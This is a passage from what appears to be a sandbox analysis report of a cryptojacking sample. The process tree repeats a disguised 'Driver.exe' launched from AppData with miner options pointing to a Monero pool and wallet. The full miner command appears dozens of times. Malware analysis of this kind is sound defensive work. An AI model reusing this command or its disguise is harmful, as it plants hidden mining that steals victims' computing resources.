      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1620
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1816
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1684
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1588
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:964
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:980
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:652
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1416
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:836
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:556
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1884
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:280
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1040
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1568
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1328
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:2008
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1004
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:752
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1376
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:1748
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      Executes dropped EXE
      PID:2036
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1392
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1416
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1724
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1152
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1356
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:836
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1472
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1976
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1924
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1392
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:568
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1472
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1036
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:472
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1600
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1604
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:240
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1676
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1360
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1920
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1324
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1036
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1340
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:556
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1676
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1028
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:2012
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:432
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:752
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:268
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:652
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1444
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1572
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1344
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1020
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1484
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1396
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1328
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:764
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1924
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1244
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1968
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:548
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:984
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:2000
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1684
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:1676
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
